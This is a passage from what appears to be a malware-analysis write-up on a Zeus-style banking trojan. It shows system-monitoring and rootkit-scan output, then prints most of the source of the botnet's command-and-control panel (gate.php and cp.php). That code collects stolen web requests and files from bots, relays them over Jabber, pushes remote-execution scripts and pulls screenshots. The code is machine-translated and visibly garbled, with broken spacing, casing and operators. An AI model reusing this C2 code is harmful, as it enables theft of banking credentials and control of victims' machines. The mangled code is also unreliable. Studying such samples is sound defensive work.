Type: REG_BINARY, Length: 180, Data: 01 00 04 80 94 00 00 00 A4 00 00 00 00 00 00 00
WriteFile C:\WINDOWS\system32\wbem\Logs\wbemcore.log SUCCESS Offset: 13,965, Length: 91
WriteFile C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf SUCCESS Offset: 0, Length: 28,186
WriteFile C:\WINDOWS\system32\config\systemprofile\Cookies\index.dat SUCCESS Offset: 0, Length:
4,096, I/O Flags: Non-cached, Paging I/O, Synchronous Paging I/O
The WinMerge comparison shows that the files are completely different from before
and after. I then used a spreadsheet and filtered the results to find the Ŗafterŗ file items of
interest based on ŖProcess Nameŗ and ŖSuccessŗ value of the registry access result. From
inspection of the Procmon output it is evident that many registry keys being modified. A lot of
system files are being created. The output of WinMerge List dlls show those ones that were
created. Directories are being queried and MAC times of the files are being captured. The
Ŗverclsid.exeŗ is an open MS vulnerability9 that was published in 2006 and fixed with a
service pack. The Ŗwinlogon.exeŗ is being controlled by the malware Ŗfile sdra64.exe.ŗ With
the Ŗexplorer.exeŗ every directory on the system was queried and the contents of each folder
was made known. The same query was done for the volume information for the hard drive.
9 http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx
The Ŗexplorer.exeŗ registry key QueryNameInformationFile gave the details of the files on the
system. The Ŗexplorer.exeŗ RegQueryValue was returning numerous values to cover all the
important details of the computer system. The Ŗsvhost.exeŗ is usually where we would see the
application program running and there are a lot of system changes that occur under this
process.
WinMerge TCPView
Only showing the difference from the Ŗbeforeŗ and Ŗafterŗ.
svchost.exe 1572 UDP xpwupdates bootpc * * 3 903 svchost.exe 1144 TCP
xpwupdates.tampabay.rr.com 1301 host53.webserver.com http ESTABLISHED
2 1,074 2 442
Rootkit Revealer
HKLM\SECURITY\Policy\Secrets\SAC* 3/22/2011 9:41 PM 0 bytes Key name contains embedded nulls (*)
HKLM\SECURITY\Policy\Secrets\SAI* 3/22/2011 9:41 PM 0 bytes Key name contains embedded nulls (*)
C:\WINDOWS\system32\lowsec 4/24/2011 8:02 PM 0 bytes Hidden from Windows API.
C:\WINDOWS\system32\lowsec\local.ds 4/24/2011 8:02 PM 34.27 KB Hidden from Windows API.
C:\WINDOWS\system32\lowsec\user.ds 4/24/2011 7:41 PM 2.37 KB Hidden from Windows API.
C:\WINDOWS\system32\lowsec\user.ds.lll 3/23/2011 11:46 PM 1.34 KB Hidden from Windows API.
C:\WINDOWS\system32\sdra64.exe 4/24/2011 8:02 PM 290.00 KB Hidden from Windows API.
C:\WINDOWS\system32\sdra64.exe:Zone.Identifier 4/24/2011 8:02 PM 26 bytes Hidden from Windows API.
Inspection of the cp.php and gate.php
gate.php (Russian comments were translated with google translator online):
<? Php define ('__REPORT__', 1); / *
Gate.
Protocol bot <-> server represents a part bot - sending a report about something
a server-side - sending the changes in the settings (or teams). From the boat, at a time
sent information about one event / object. * /
if (@ $ _SERVER ['REQUEST_METHOD']! == 'POST') die (); require_once ('system / global.php');
require_once ('system / config.php');
/ / Get the data. $ Data = @ file_get_contents ('php: / / input');
$ Data_size = @ strlen ($ data);
if ($ data_size <HEADER_SIZE + ITEM_HEADER_SIZE) die (); $ Data = RC4 ($ data, BOTNET_CRYPTKEY);
/ / Verefikatsiya. If the same MD5, it makes no sense to check something else. if (strcmp (md5 (substr ($ data, HEADER_SIZE), true), substr ($ data, HEADER_MD5, 16))! == 0) die ();
/ / Parses the data (Data compression is not supported). / / Congratulations mega hackers, this algorithm will allow you to easily read from a bot. Do not forget to write a parser 18 and 100
backdoors.
$ List = array (); for ($ i = HEADER_SIZE; $ i <$ data_size;)
{
$ K = @ unpack ('L4', @ substr ($ data, $ i, ITEM_HEADER_SIZE)); $ List [$ k [1]] = @ substr ($ data, $ i + ITEM_HEADER_SIZE, $ k [3]);
$ I + = (ITEM_HEADER_SIZE + $ k [3]);
}
unset ($ data);
/ / The main parameters that should always be. if (empty ($ list [SBCID_BOT_VERSION]) | | empty ($ list [SBCID_BOT_ID])) die ();
/ / Connect to the database. if (! ConnectToDB ()) die ();
////////////////////////////////////////////////// / / Process the data.
////////////////////////////////////////////////// //////////////////////////////////////////////////
$ Bot_id = str_replace ("\ x01", "\ x02", trim ($ list [SBCID_BOT_ID]));
$ Bot_id_q = addslashes ($ bot_id);
$ Botnet = (empty ($ list [SBCID_BOTNET]))? DEFAULT_BOTNET: str_replace ("\ x01", "\ x02", trim ($ list [SBCID_BOTNET]));
$ Botnet_q = addslashes ($ botnet);
$ Bot_version = ToUint ($ list [SBCID_BOT_VERSION]); $ Real_ipv4 = trim ((! Empty ($ _GET ['ip'])? $ _GET ['Ip']: $ _SERVER ['REMOTE_ADDR']));
$ Country = GetCountryIPv4 (); / / str_replace ("\ x01", "\ x02", GetCountryIPv4 ());
$ Country_q = addslashes ($ country); $ Curtime = time ();
$ Rtime_min_online = $ curtime - BOTNET_TIMEOUT; / / minimum time for which the bot is online.
/ / Report on execution of the script.
if (! empty ($ list [SBCID_SCRIPT_ID]) & & isset ($ list [SBCID_SCRIPT_STATUS], $ list [SBCID_SCRIPT_RESULT]) & &
strlen ($ list [SBCID_SCRIPT_ID]) == 16) {
if (! @ mysql_query ("INSERT INTO botnet_scripts_stat SET bot_id = '{$ bot_id_q}', bot_version = {$ bot_version}, rtime = {$
curtime},". "Extern_id = '". Addslashes ($ list [SBCID_SCRIPT_ID ])."',".
"Type =". (ToInt ($ list [SBCID_SCRIPT_STATUS]) == 0? 2: 3 ).",". "Report = '". Addslashes ($ list [SBCID_SCRIPT_RESULT ])."'")) die ();
}
/ / Write log / files. else if (! empty ($ list [SBCID_BOTLOG]) & &! empty ($ list [SBCID_BOTLOG_TYPE]))
{
$ Type = ToInt ($ list [SBCID_BOTLOG_TYPE]);
if ($ type == BLT_FILE)
{ / / Extensions, which are remote start.
$ Bad_exts = array ('. Php3', '. Php4', '. Php5', '. Php', '. Asp', '. Aspx', '. Exe', '. Pl', '. Cgi', '. cmd', '. bat', '. phtml', '. phtm');
$ Fd_hash = 0; $ Fd_size = strlen ($ list [SBCID_BOTLOG]);
/ / Generate the file name. if (IsHackNameForPath ($ bot_id) | | IsHackNameForPath ($ botnet)) die ();
$ File_root = REPORTS_PATH. '/ Files /'. Urlencode ($ botnet ).'/'. urlencode ($ bot_id);
$ File_path = $ file_root;
$ Last_name ='';
$ L = explode ('/', (isset ($ list [SBCID_PATH_DEST]) & & strlen ($ list [SBCID_PATH_DEST])> 0? Str_replace ('\ \', '/', $ list [SBCID_PATH_DEST]): 'unknown '));
foreach ($ l as & $ k)
{ if (IsHackNameForPath ($ k)) die ();
$ File_path .='/'.($ last_name = urlencode ($ k));
} if (strlen ($ last_name) === 0) $ file_path .= '/ unknown.dat';
unset ($ l);
/ / Check extension, and specify the file mask.
if (($ ext = strrchr ($ last_name,'.')) === false | | in_array (strtolower ($ ext), $ bad_exts)! == false) $ file_path .= '. dat';
$ Ext_pos = strrpos ($ file_path,'.');
/ / FIXME: If the name is too long.
if (strlen ($ file_path)> 180) $ file_path = $ file_root. '/ longname.dat';
/ / Add the file.
for ($ i = 0; $ i <9999; $ i + +)
{
if ($ i == 0) $ f = $ file_path;
else $ f = substr_replace ($ file_path,'('.$ i.').', $ ext_pos, 1);
if (file_exists ($ f))
{ if ($ fd_size == filesize ($ f))
{
if ($ fd_hash === 0) $ fd_hash = md5 ($ list [SBCID_BOTLOG], true); if (strcmp (md5_file ($ f, true), $ fd_hash) === 0) break;
}
} else
{
if (! CreateDir (dirname ($ file_path)) | |! ($ h = fopen ($ f, 'wb'))) die ();
flock ($ h, LOCK_EX);
fwrite ($ h, $ list [SBCID_BOTLOG]); flock ($ h, LOCK_UN);
fclose ($ h);
break;
}
} }
else
{ / / Write to the base.
if (REPORTS_TO_DB === 1)
{ $ Table = 'botnet_reports_'. Gmdate ('ymd', $ curtime);
$ Query = "INSERT DELAYED INTO {$ table} SET bot_id = '{$ bot_id_q}', botnet = '{$ botnet_q}', bot_version = {$ bot_version}, type = {$ type}, country = '{$ country_q } ', rtime = {$ curtime}, ".
"Path_source = '". (Empty ($ list [SBCID_PATH_SOURCE])?'': Addslashes ($ list [SBCID_PATH_SOURCE ]))."',".
"Path_dest = '". (Empty ($ list [SBCID_PATH_DEST])?'': Addslashes ($ list [SBCID_PATH_DEST ]))."',". "Time_system =". (Empty ($ list [SBCID_TIME_SYSTEM])? 0: ToUint ($ list [SBCID_TIME_SYSTEM ])).",".
"Time_tick =". (Empty ($ list [SBCID_TIME_TICK])? 0: ToUint ($ list [SBCID_TIME_TICK ])).",".
"Time_localbias =". (Empty ($ list [SBCID_TIME_LOCALBIAS])? 0: ToInt ($ list [SBCID_TIME_LOCALBIAS ])).",".
"Os_version = '". (Empty ($ list [SBCID_OS_INFO])?'': Addslashes ($ list [SBCID_OS_INFO ]))."',".
"Language_id =". (Empty ($ list [SBCID_LANGUAGE_ID])? 0: ToUshort ($ list [SBCID_LANGUAGE_ID ])).",".
"Process_name = '". (Empty ($ list [SBCID_PROCESS_NAME])?'': Addslashes ($ list [SBCID_PROCESS_NAME ]))."',". "Process_user = '". (Empty ($ list [SBCID_PROCESS_USER])?'': Addslashes ($ list [SBCID_PROCESS_USER ]))."',".
"Ipv4 = '". addslashes ($ real_ipv4 )."',".
"Context = '". addslashes ($ list [SBCID_BOTLOG ])."'";
/ / I think this arrangement improves performance.
if (! @ mysql_query ($ query) & & (! @ mysql_query ("CREATE TABLE IF NOT EXISTS {$ table} LIKE botnet_reports") | |! @ mysql_query ($ query))) die ();
}
/ / Write to file.
if (REPORTS_TO_FS === 1) {
if (IsHackNameForPath ($ bot_id) | | IsHackNameForPath ($ botnet)) die ();
$ File_path = REPORTS_PATH. '/ Other /'. Urlencode ($ botnet ).'/'. urlencode ($ bot_id); if (! CreateDir ($ file_path) | |! ($ h = fopen ($ file_path. '/ reports.txt', 'ab'))) die ();
flock ($ h, LOCK_EX); fwrite ($ h, str_repeat ("=", 1980). "\ r \ n".
"Bot_id = {$ bot_id} \ r \ n".
"Botnet = {$ botnet} \ r \ n". "Bot_version =". IntToVersion ($ bot_version). "\ R \ n".
"Ipv4 = {$ real_ipv4} \ r \ n".
"Country = {$ country} \ r \ n". "Type = {$ type} \ r \ n".
"Rtime =". gmdate ('H: i: s d.m.Y', $ curtime). "\ r \ n".
"Time_system =". (Empty ($ list [SBCID_TIME_SYSTEM])? 0: gmdate ('H: i: s dmY', ToInt ($ list [SBCID_TIME_SYSTEM ])))." \ r \ n ". / / Time () also returns a int .
"Time_tick =". (Empty ($ list [SBCID_TIME_TICK])? 0: TickCountToTime (ToUint ($ list [SBCID_TIME_TICK]) /
1000)). "\ R \ n".
"Time_localbias =". (Empty ($ list [SBCID_TIME_LOCALBIAS])? 0: TimeBiasToText (ToInt ($ list
[SBCID_TIME_LOCALBIAS ])))." \ r \ n ".
"Os_version =". (Empty ($ list [SBCID_OS_INFO])?'': OSDataToString ($ list [SBCID_OS_INFO ]))." \ r \ n ". "Language_id =". (Empty ($ list [SBCID_LANGUAGE_ID])? 0: ToUshort ($ list [SBCID_LANGUAGE_ID ]))." \ r \ n ".
"Process_name =". (Empty ($ list [SBCID_PROCESS_NAME])?'': $ List [SBCID_PROCESS_NAME]). "\ R \ n".
"Process_user =". (Empty ($ list [SBCID_PROCESS_USER])?'': $ List [SBCID_PROCESS_USER]). "\ R \ n". "Path_source =". (Empty ($ list [SBCID_PATH_SOURCE])?'': $ List [SBCID_PATH_SOURCE]). "\ R \ n".
"Context = \ r \ n". $ List [SBCID_BOTLOG]. "\ R \ n \ r \ n \ r \ n");
flock ($ h, LOCK_UN); fclose ($ h);
}
if (REPORTS_JN === 1) IMNotify ($ type, $ list, $ bot_id); }
}
/ / Report on online status. else if (! empty ($ list [SBCID_BOT_STATUS]))
{
/ / Standard request. $ Query = "bot_id = '{$ bot_id_q}', botnet = '{$ botnet_q}', bot_version = {$ bot_version}, country = '{$ country_q}', rtime_last =
{$ curtime},".
"Net_latency =". (Empty ($ list [SBCID_NET_LATENCY])? 0: ToUint ($ list [SBCID_NET_LATENCY ])).",".
"Port_s1 =". (Empty ($ list [SBCID_PORT_S1])? 0: ToUshort ($ list [SBCID_PORT_S1 ])).",".
"Time_localbias =". (Empty ($ list [SBCID_TIME_LOCALBIAS])? 0: ToInt ($ list [SBCID_TIME_LOCALBIAS ])).",". "Os_version = '". (Empty ($ list [SBCID_OS_INFO])?'': Addslashes ($ list [SBCID_OS_INFO ]))."',".
"Language_id =". (Empty ($ list [SBCID_LANGUAGE_ID])? 0: ToUshort ($ list [SBCID_LANGUAGE_ID ])).",".
"Ipv4 = '". addslashes ($ real_ipv4 )."',". "Flag_nat = IF (net_latency> 0, IF (port_s1> 0, 0, 1), 1 )";// FIXME: NAT Detect bots.
if (! mysql_query ("INSERT INTO botnet_list SET comments ='', rtime_first = {$ curtime}, rtime_online = {$ curtime}, flag_install =". (ToInt ($ list [SBCID_BOT_STATUS]) == BS_INSTALLED? 1: 0) . ", {$ query}".
"ON DUPLICATE KEY UPDATE rtime_online = IF (rtime_last <= {$ rtime_min_online}, {$ curtime}, rtime_online), {$ query}")) die ();
/ / Find the script to send. $ Reply_data ='';
$ Reply_count = 0;
$ Bot_id_qm = ToSQLSafeMask ($ bot_id_q);
$ Botnet_qm = ToSQLSafeMask ($ botnet_q);
$ Country_qm = ToSQLSafeMask ($ country_q);
$ R = @ mysql_query ("SELECT extern_id, script_bin, send_limit, id FROM botnet_scripts WHERE flag_enabled = 1 AND".
"(Countries_wl =''OR countries_wl LIKE BINARY '% \ x01 {$ country_qm} \ x01%') AND". "(Countries_bl NOT LIKE BINARY '% \ x01 {$ country_qm} \ x01%') AND".
"(Botnets_wl =''OR botnets_wl LIKE BINARY '% \ x01 {$ botnet_qm} \ x01%') AND".
"(Botnets_bl NOT LIKE BINARY '% \ x01 {$ botnet_qm} \ x01%') AND". "(Bots_wl =''OR bots_wl LIKE BINARY '% \ x01 {$ bot_id_qm} \ x01%') AND".
"(Bots_bl NOT LIKE BINARY '% \ x01 {$ bot_id_qm} \ x01%')".
"LIMIT 10");
if ($ r) while ((($ m = mysql_fetch_row ($ r)))) {
$ Eid = addslashes ($ m [0]);
/ / Check whether the limit is reached.
if ($ m [2], = 0 & & ($ j = @ mysql_query ("SELECT COUNT (*) FROM botnet_scripts_stat WHERE type = 1 AND extern_id =
'{$ eid }'")) & & ($ c = mysql_fetch_row ($ j)) & & $ c [0]> = $ m [2]) {
@ Mysql_query ("UPDATE botnet_scripts SET flag_enabled = 0 WHERE id = {$ m [3]} LIMIT 1");
continue; }
/ / Dobovlyaem bot in the list sent. if (@ mysql_query ("INSERT HIGH_PRIORITY INTO botnet_scripts_stat SET extern_id = '{$ eid}', type = 1, bot_id = '{$
bot_id_q}', bot_version = {$ bot_version}, rtime = {$ curtime}, report = ' Sended '"))
{ $ Size = strlen ($ m [1]) + strlen ($ m [0]);
$ Reply_data .= pack ('LLLL', + + $ reply_count, 0, $ size, $ size). $ M [0]. $ M [1];
}
}
if ($ reply_count> 0) {
$ Reply_data = pack ('LLL', HEADER_SIZE + strlen ($ reply_data), 0, $ reply_count). Md5 ($ reply_data, true). $ Reply_data;
echo RC4 ($ reply_data, BOTNET_CRYPTKEY); die ();
}
} else die ();
/ / Send an empty response. SendEmptyReply ();
////////////////////////////////////////////////// ///////////////////////////// / / Functions.
////////////////////////////////////////////////// /////////////////////////////
/ *
Send a blank response and output.
* / function SendEmptyReply ()
{
echo RC4 (pack ('LLL', HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1). "\ x4A \ xE7 \ x13 \ x36 \ xE4 \ x4B \ xF9 \ xBF \ x79 \ xD2 \ x75 \ x2E \ x23 \ x48 \ x18 \ xA5 "." \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 ", BOTNET_CRYPTKEY);
die ();
}
/ *
Getting the country.
Return - string, country. * /
function GetCountryIPv4 ()
{ global $ real_ipv4;
$ Ip = sprintf ('% u', ip2long ($ real_ipv4));
if (($ r = @ mysql_query ("SELECT c FROM ipv4toc WHERE l <='".$ ip." 'AND h >='".$ ip. "' LIMIT 1")) & & ($ m =
mysql_fetch_row ( $ r))! == false) return $ m [0];
else return'--';
}
/ *
Kovertatsiya Bin2UINT.
IN $ str - string, the original binary string.
Return - int, the converted number.
* /
function ToUint ($ str)
{
$ Q = @ unpack ('L', $ str); return is_array ($ q) & & is_numeric ($ q [1])? ($ Q [1] <0? Sprintf ('% u', $ q [1]): $ q [1]): 0;
}
/ *
Kovertatsiya Bin2INT.
IN $ str - string, the original binary string.
Return - int, the converted number. * /
function ToInt ($ str)
{ $ Q = @ unpack ('l', $ str);
return is_array ($ q) & & is_numeric ($ q [1])? $ Q [1]: 0;
}
/ *
Kovertatsiya Bin2SHORT.
IN $ str - string, the original binary string.
Return - int, the converted number.
* /
function ToUshort ($ str) {
$ Q = @ unpack ('S', $ str);
return is_array ($ q) & & is_numeric ($ q [1])? $ Q [1]: 0; }
/ * Checks whether a name uvyazimym as part of the road.
IN $ name - name to check. Return - true - if the name uvyazmo,
false - if not uvyazimo.
* / function IsHackNameForPath ($ name)
{
return (strlen ($ name)> 0 & & strcmp ($ name,'..')! == 0 & & strcmp ($ name, '.')! == 0 & & strpos ($ name, '/') === false & & strpos ($ name, '\ \') === false & & strpos ($ name, "\ x00") === false
)? false: true;
}
function IMNotify (& $ type, & $ list, & $ bot_id)
{ if (($ type == BLT_HTTP_REQUEST | | $ type == BLT_HTTPS_REQUEST) & &! empty ($ list [SBCID_PATH_SOURCE]))
{
$ Ml = split ("\ x01", REPORTS_JN_LIST); foreach ($ ml as & $ mask)
{ if (@ preg_match ('#^'. str_replace ('\ \ *','.*', preg_quote ($ mask,'#')).'$# i ', $ list [SBCID_PATH_SOURCE])> 0)
{
$ Message = htmlentities ("Bot ID:". $ Bot_id. "\ NURL:". $ List [SBCID_PATH_SOURCE]. "\ N \ n". Substr ($ list [SBCID_BOTLOG], 0, 1024));
error_reporting (0);
if (strlen (REPORTS_JN_LOGFILE)> 0 & & ($ fh = @ fopen (REPORTS_JN_LOGFILE, 'at'))! == false)
{ @ Fwrite ($ fh, $ message. "\ N \ n". Str_repeat ('=', 1940). "\ N \ n");
@ Fclose ($ fh);
}
require_once ("system / jabberclass.php");
$ Jab = new Jabber;
$ Jab-> server = REPORTS_JN_SERVER;
$ Jab-> port = REPORTS_JN_PORT;
$ Jab-> username = REPORTS_JN_ACCOUNT;
$ Jab-> password = REPORTS_JN_PASS;
if ($ jab-> Connect ())
{ $ Jab-> SendAuth ();
$ Jab-> SendPresence (NULL, NULL, "online");
$ Jab-> SendMessage (REPORTS_JN_TO, "normal", NULL, array ("body" => $ message)); $ Jab-> Disconnect ();
}
if (strlen (REPORTS_JN_SCRIPT)> 0)
{
$ Eid = md5 ($ mask, true); $ Script = 'rexec "'. Trim (REPORTS_JN_SCRIPT). '"-F';
$ Size = strlen ($ eid) + strlen ($ script);
$ Reply_data = pack ('LLLL', 1, 0, $ size, $ size). $ Eid. $ Script; echo RC4 (pack ('LLL', HEADER_SIZE + strlen ($ reply_data), 0, 1). md5 ($ reply_data, true). $ reply_data,
BOTNET_CRYPTKEY);
die ();
}
break;
} }
}
} ?>
cp.php (Russian comments were translated with google translator online):
<? Php define ('__CP__', 1);
require_once ('system / global.php');
if (! @ include_once ('system / config.php')) die ('Hello! How are you?');
////////////////////////////////////////////////// /////////////////////////////
/ / Constants. ////////////////////////////////////////////////// /////////////////////////////
define ('CURRENT_TIME', time ()); / / Current time. define ('ONLINE_TIME_MIN', (CURRENT_TIME - BOTNET_TIMEOUT)); / / Minimum time for the status of "Online."
define ('DEFAULT_LANGUAGE', 'en'); / / default language.
define ('THEME_PATH', 'theme'); / / folder for the theme.
/ / HTTP requests.
define ('QUERY_SCRIPT', basename ($ _SERVER ['PHP_SELF'])); define ('QUERY_SCRIPT_HTML', QUERY_SCRIPT);
define ('QUERY_VAR_MODULE', 'm'); / / variable points to the current module. define ('QUERY_STRING_BLANK', QUERY_SCRIPT. '? m ='); / / Empty query string.
define ('QUERY_STRING_BLANK_HTML', QUERY_SCRIPT_HTML. '? m ='); / / Empty query string in HTML.
define ('CP_HTTP_ROOT', str_replace ('\ \', '/', (! empty ($ _SERVER ['SCRIPT_NAME'])? dirname ($ _SERVER ['SCRIPT_NAME']):'/'))); / / The root of the CP.
/ / A session cookie. define ('COOKIE_USER', 'p'); / / username in cookies.
define ('COOKIE_PASS', 'u'); / / user password in the cookie.
define ('COOKIE_LIVETIME', CURRENT_TIME + 2592000) / / Lifetime of cookies. define ('COOKIE_SESSION', 'ref'); / / variable to store the session.
define ('SESSION_LIVETIME', CURRENT_TIME + 1300) / / Lifetime of the session.
////////////////////////////////////////////////// /////////////////////////////
/ / Initialize.
////////////////////////////////////////////////// /////////////////////////////
/ / Connect to the database.
if (! ConnectToDB ()) die (mysql_error_ex ());
/ / Connect the topic.
require_once (THEME_PATH. '/ index.php');
/ Management / login.
if (! empty ($ _GET [QUERY_VAR_MODULE]))
{ / / Login form.
if (strcmp ($ _GET [QUERY_VAR_MODULE], 'login') === 0)
{ UnlockSessionAndDestroyAllCokies ();
if (isset ($ _POST ['user']) & & isset ($ _POST ['pass'])) {
$ User = $ _POST ['user'];
$ Pass = md5 ($ _POST ['pass']);
/ / Check the login.
if (@ mysql_query ("SELECT id FROM cp_users WHERE name = '". addslashes ($ user). "' AND pass = '". addslashes ($ pass). "'
AND flag_enabled = '1 'LIMIT 1") & & @ mysql_affected_rows () == 1)
{
if (isset ($ _POST ['remember']) & & $ _POST ['remember'] == 1) {
setcookie (COOKIE_USER, md5 ($ user), COOKIE_LIVETIME, CP_HTTP_ROOT);
setcookie (COOKIE_PASS, $ pass, COOKIE_LIVETIME, CP_HTTP_ROOT); }
LockSession (); $ _SESSION ['Name'] = $ user;
$ _SESSION ['Pass'] = $ pass;
/ / UnlockSession ();
header ('Location:'. QUERY_STRING_BLANK. 'home');
} else ShowLoginForm (true);
die ();
}
ShowLoginForm (false);
die (); }
/ / Exit if (strcmp ($ _GET ['m'], 'logout') === 0)
{
UnlockSessionAndDestroyAllCokies (); header ('Location:'. QUERY_STRING_BLANK. 'login');
die ();
} }
////////////////////////////////////////////////// /////////////////////////////
/ / Check the login data.
////////////////////////////////////////////////// /////////////////////////////
$ Logined = 0, / / flag means zalogininy we.
/ / Login through the session.
LockSession ();
if (! empty ($ _SESSION ['name']) & &! empty ($ _SESSION ['pass'])) {
if (($ r = @ mysql_query ("SELECT * FROM cp_users WHERE name = '". addslashes ($ _SESSION [' name'])."' AND pass = '".
addslashes ($ _SESSION [' pass']). "'AND flag_enabled = '1' LIMIT 1 ")))$ logined = @ mysql_affected_rows (); }
/ / Login through cookies.
if ($ logined! == 1 & &! empty ($ _COOKIE [COOKIE_USER]) & &! empty ($ _COOKIE [COOKIE_PASS])) {
if (($ r = @ mysql_query ("SELECT * FROM cp_users WHERE MD5 (name )='". addslashes ($ _COOKIE [COOKIE_USER ])."'
AND pass = '". addslashes ($ _COOKIE [COOKIE_PASS]). " 'AND flag_enabled = '1' LIMIT 1 ")))$ logined = @
mysql_affected_rows ();
} / / Unable to login.
if ($ logined! == 1)
{ UnlockSessionAndDestroyAllCokies ();
header ('Location:'. QUERY_STRING_BLANK. 'login');
die (); }
/ / Get the user data. $ _USER_DATA = @ Mysql_fetch_assoc ($ r);
if ($ _USER_DATA === false) die (mysql_error_ex ());
$ _SESSION ['Name'] = $ _USER_DATA ['name']; $ _SESSION ['Pass'] = $ _USER_DATA ['pass'];
/ / Connect the tongue. if (@ strlen ($ _USER_DATA ['language'])! = 2 | |! SafePath ($ _USER_DATA ['language']) | |! file_exists ('system / lng .'.$_
USER_DATA [' language '].' . php'))$_ USER_DATA ['language'] = DEFAULT_LANGUAGE;
require_once ('system / lng .'.$_ USER_DATA [' language'].'. php ');
UnlockSession ();
////////////////////////////////////////////////// /////////////////////////////
/ / Define the menu.
////////////////////////////////////////////////// /////////////////////////////
/ / Main Menu.
$ _MAINMENU = Array (/ / module. / / Title. / / Required Rights. array (0, LNG_MM_STATS, array ()),
array ('stats_main', LNG_MM_STATS_MAIN, array ('r_stats_main')),
array ('stats_os', LNG_MM_STATS_OS, array ('r_stats_os')),
array (0, LNG_MM_BOTNET, array ()),
array ('botnet_bots', LNG_MM_BOTNET_BOTS, array ('r_botnet_bots')), array ('botnet_scripts', LNG_MM_BOTNET_SCRIPTS, array ('r_botnet_scripts')),
array (0, LNG_MM_REPORTS, array ()), array ('reports_db', LNG_MM_REPORTS_DB, array ('r_reports_db')),
array ('reports_files', LNG_MM_REPORTS_FILES, array ('r_reports_files')),
array ('reports_jn', LNG_MM_REPORTS_JN, array ('r_reports_jn')),
array (0, LNG_MM_SYSTEM, array ()),
array ('sys_info', LNG_MM_SYSTEM_INFO, array ('r_system_info')), array ('sys_options', LNG_MM_SYSTEM_OPTIONS, array ('r_system_options')),
array ('sys_user', LNG_MM_SYSTEM_USER, array ('r_system_user')),
array ('sys_users', LNG_MM_SYSTEM_USERS, array ('r_system_users')) );
/ / Menu Deytvie over bot. Also used for an array of bots. $ _BOT_MENU = Array (
array ('fullinfo', LNG_MBA_FULLINFO, array ('r_botnet_bots')), array ('fullinfoss', LNG_MBA_FULLINFOSS, array ('r_botnet_bots')),
array (0, LNG_MBA_SEPARATOR, array ()), array ('today_dbreports', LNG_MBA_TODAY_DBREPORTS, array ('r_reports_db')),
array ('week_dbreports', LNG_MBA_WEEK_DBREPORTS, array ('r_reports_db')),
array ('files', LNG_MBA_FILES, array ('r_reports_files')),
array (0, LNG_MBA_SEPARATOR, array ()),
array ('remove', LNG_MBA_REMOVE, array ('r_edit_bots')), array ('removeex', LNG_MBA_REMOVE_REPORTS, array ('r_edit_bots', 'r_reports_db_edit', 'r_reports_files_edit')),
array (0, LNG_MBA_SEPARATOR, array ()), array ('port_socks', LNG_MBA_PORT_SOCKS, array ('r_botnet_bots')),
array ('newscript', LNG_MBA_NEWSCRIPT, array ('r_botnet_scripts_edit'))
);
OptimizeMenu ($ _BOT_MENU, false);
////////////////////////////////////////////////// /////////////////////////////
/ / Handle the group of bots. ////////////////////////////////////////////////// /////////////////////////////
if ((! empty ($ _GET ['botsaction']) | |! empty ($ _POST ['botsaction'])) & & ((! empty ($ _POST ['bots']) & & is_array ($ _POST [' bots '])) | | (! empty ($ _GET [' bots ']) & & is_array ($ _GET [' bots']))))
{
$ Bedit = empty ($ _USER_DATA ['r_edit_bots'])? 0: 1; $ Ba =! Empty ($ _GET ['botsaction'])? $ _GET ['Botsaction']: $ _POST ['botsaction'];
$ Blist =! Empty ($ _POST ['bots']) & & is_array ($ _POST ['bots'])? $ _POST ['Bots']: $ _GET ['bots'];
$ Blist = array_unique ($ blist);
/ / Check whether the right of action.
$ Deny = true; foreach ($ _BOT_MENU as $ item) if ($ item [0]! == 0 & & strcmp ($ item [0], $ ba) === 0) {$ deny = false; break;}
if ($ deny) ThemeFatalError (LNG_ACCESS_DEFINED);
/ / Is a list of bots to MySQL.
$ Sql_blist ='';
$ Count = 0;
foreach ($ blist as $ bot) $ sql_blist .= ($ count + + == 0?'': 'OR'). "bot_id = '". addslashes ($ bot )."'";
if (strcmp ($ ba, 'fullinfo') === 0 | | strcmp ($ ba, 'fullinfoss') === 0) {
/ / Mode updatings.
if ($ bedit & & isset ($ _GET ['save']) & & (isset ($ _POST ['used']) & & is_array ($ _POST ['used'])) & & (isset ($ _POST ['comments'] ) & & is_array ($ _POST ['comments'])))
{
$ Q =''; foreach ($ blist as $ i => $ bot) if (isset ($ _POST ['used'] [$ i]) & & isset ($ _POST ['comments'] [$ i]))
{
@ Mysql_query ("UPDATE botnet_list SET flag_used ='".($_ POST ['used'] [$ i] == 1? 1: 0 )."', comments = '". Addslashes (substr ($ _POST [' comments '] [$ i], 0, 250 ))."' WHERE bot_id =' ". addslashes ($ bot)." 'LIMIT 1 ");
$ Q .= '& bots []='. urlencode ($ bot);
}
header ('Location:'. QUERY_SCRIPT. '? botsaction ='. urlencode ($ ba). $ q);
die (); }
/ / Screenshot. if (strcmp ($ ba, 'fullinfoss') === 0 & & isset ($ _GET ['ipv4']) & & isset ($ _GET ['port']))
{
$ Format = 'image /'.$_ USER_DATA [' ss_format ']; $ Data = 0;
if (($ sock = @ fsockopen ($ _GET ['ipv4'], $ _GET ['port'], $ errn, $ errs, 5))) {
@ Stream_set_timeout ($ sock, 5);
@ Fwrite ($ sock, pack ('LLL', 10, strlen ($ format) + 4, $ _USER_DATA ['ss_quality']).$ format); @ Fflush ($ sock);
if (($ fs = @ fread ($ sock, 8)) & & ($ fs = @ unpack ('L2', $ fs)))
{
while ($ data <$ fs [1] & &! @ feof ($ sock)) {
$ Need = min ($ fs [2], $ fs [1] - $ data);
if (! ($ td = @ fread ($ sock, $ need))) break;
$ Sm = strlen ($ td);
while ($ sm <$ need & &! @ feof ($ sock) & & ($ td2 = @ fread ($ sock, $ need-$ sm ))){$ sm + = strlen ($ td2); $ td .= $
td2;} if ($ data == 0) header ('Content-Type:'. $ format);
$ Data + = $ sm;
echo $ td; if (! @ fwrite ($ sock, pack ('L', $ fs [2]))) break;
@ Fflush ($ sock);
} }
@ Fclose ($ sock);
}
if ($ data === 0) {
header ('Content-Type: image / png');
echo file_get_contents (THEME_PATH. '/ failed.png'); }
die ();
}
/ / Stdout.
if (! ($ r = @ mysql_query ('SELECT *, IF (rtime_last> = \''. ONLINE_TIME_MIN.' \ ', 1, 0) AS is_online FROM botnet_list WHERE'. $ sql_blist))) ThemeMySQLError ();
/ / Get the result. $ Res = array ();
